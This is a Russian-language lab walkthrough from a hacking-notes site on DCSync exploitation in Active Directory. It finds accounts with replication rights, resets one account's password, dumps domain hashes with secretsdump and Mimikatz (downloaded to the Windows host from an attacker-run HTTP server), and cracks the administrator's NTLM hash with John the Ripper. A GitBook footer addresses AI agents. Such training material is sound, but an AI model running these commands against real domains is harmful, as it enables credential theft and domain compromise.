> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/active-directory/acl-security-descriptors-and-permissions/dcsync-exploitation.md).

# Эксплуатация DCSync

#### Принцип DCSync

В Active Directory контроллеры домена должны синхронизироваться друг с другом, чтобы поддерживать согласованную базу данных.

Например, когда в одном контроллере домена вносится изменение, это изменение должно быть реплицировано на другие контроллеры домена.

Эта репликация касается, в частности:

* пользователей;
* группах;
* хэшей паролей;
* атрибутов Active Directory;
* объектов домена;
* информации, необходимой для корректного функционирования домена.

#### 2. Почему DCSync является чувствительной техникой

Один **DCSync** атака или техника подразумевает злоупотребление правами репликации Active Directory.

Обычно только контроллеры домена должны иметь возможность запрашивать эту чувствительную информацию.

Но если у пользователя или группы слишком высокие права на репликацию, они могут вести себя как контроллер домена и запрашивать чувствительные данные из AD.

Важные права включают:

```
DS-Replication-Get-Changes
DS-Replication-Get-Changes-All
DS-Replication-Get-Changes-In-Filtered-Set
```

Эти права могут позволить вам получить критически важную информацию из домена.

#### 3. Цель в лабораторной работе

В этой лабораторной работе цель — определить, какие пользователи или группы имеют права DCSync.

Мы будем использовать **BloodHound** чтобы найти учетные записи, у которых есть эти разрешения.

#### 4. Поиск учетных записей с правами DCSync в BloodHound

В BloodHound можно использовать следующий предопределенный запрос:

```bash
Найти субъектов с правами DCSync
```

<figure><img src="/files/e9a8587ee02bbe2175e605b58f67378fc31e5cd3" alt=""><figcaption></figcaption></figure>

Этот запрос определяет субъекты — пользователей, группы или компьютеры — у которых есть права репликации в домене.

<figure><img src="/files/8e63924cb92623af246f35a17bce9c833de3504a" alt=""><figcaption></figcaption></figure>

#### 5. Поиск с помощью PowerView

С помощью PowerView также можно определить учетные записи с этими правами, используя следующую команду:

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -match "DS-Replication-Get-Changes"} | select ObjectDN,ObjectAceType,@{name="Name";expression={Convert-SidToName $_.SecurityIdentifier}}
```

{% endcode %}

Эта команда отображает объекты с разрешениями, связанными с репликацией Active Directory.

<figure><img src="/files/bd61fa229ce4889f076681cc5102a86c74c4bfac" alt=""><figcaption></figcaption></figure>

#### 6. Смена пароля целевой учетной записи

В лабораторной работе мы затем меняем пароль обнаруженной учетной записи, чтобы иметь возможность использовать ее для эксплуатации.

Используемый пароль:

```
Password1@
```

#### 7. Удаленная эксплуатация с помощью secretsdump

Затем вы можете использовать `secretsdump.py` для удаленного использования прав DCSync:

{% code overflow="wrap" %}

```bash
secretsdump.py 'whoami.local/hyacinthe.maryrose:'Password1@'@172.16.0.100'
```

{% endcode %}

Это позволяет восстановить чувствительную информацию, доступную благодаря правам репликации учетной записи.

<figure><img src="/files/8b3fbfcc236341241c0df391f46563e31948ddd3" alt=""><figcaption></figcaption></figure>

#### 8. Использование Mimikatz на машине Windows

{% embed url="<https://github.com/gentilkiwi/mimikatz>" %}

Затем мы загружаем Mimikatz в виде `.zip` архива, после чего переносим исполняемый файл на машину Windows в лаборатории.

На атакующей машине мы запускаем HTTP-сервер:

{% code overflow="wrap" %}

```wasm
python3 -m http.server 8000
```

{% endcode %}

С машины Windows мы загружаем исполняемый файл

{% code overflow="wrap" %}

```powershell
(New-Object System.NET.WebClient).DownloadFile('http://172.16.0.2:8000/mimikatz.exe', 'mimikatz.exe')
```

{% endcode %}

Затем мы запускаем его:

{% code overflow="wrap" %}

```powershell
. ./mimikatz.exe
```

{% endcode %}

<figure><img src="/files/be1a02f9d90bb8a157cdf91d3732cc348323de35" alt=""><figcaption></figcaption></figure>

#### 9. Получение хэша администратора

С помощью Mimikatz можно запросить репликацию секретов конкретного пользователя, например учетной записи администратора:

{% code overflow="wrap" %}

```powershell
lsadump::dcsync /user:whoami/administrador
```

{% endcode %}

<figure><img src="/files/df51cf1295e082a4f68e13ff5f4f9daaeaf6c449" alt=""><figcaption></figcaption></figure>

#### 10. Получение хэшей всех пользователей

Также можно запросить информацию для всех пользователей в домене:

{% code overflow="wrap" %}

```powershell
lsadump::dcsync /whoami:whoami.local /all /csv
```

{% endcode %}

<figure><img src="/files/2841f369204b649a6ee4b6349a015ed283073d62" alt=""><figcaption></figcaption></figure>

#### 12. Подготовка хэша для взлома

Затем мы помещаем полученный хэш в файл в формате, совместимом с John the Ripper:

{% code overflow="wrap" %}

```bash
echo Administrador:500:aad3b435b51404eeaad3b435b51404ee:a87f3a337d73085c45f9416be5787d86::: > admin.hash
```

{% endcode %}

Затем мы начинаем подбор NTLM-хэша:

{% code overflow="wrap" %}

```bash
john --format=NT admin.hash
```

{% endcode %}

<figure><img src="/files/c9fb468c1fa05382c51d521b3ddaf9b303f4e4e7" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/active-directory/acl-security-descriptors-and-permissions/dcsync-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
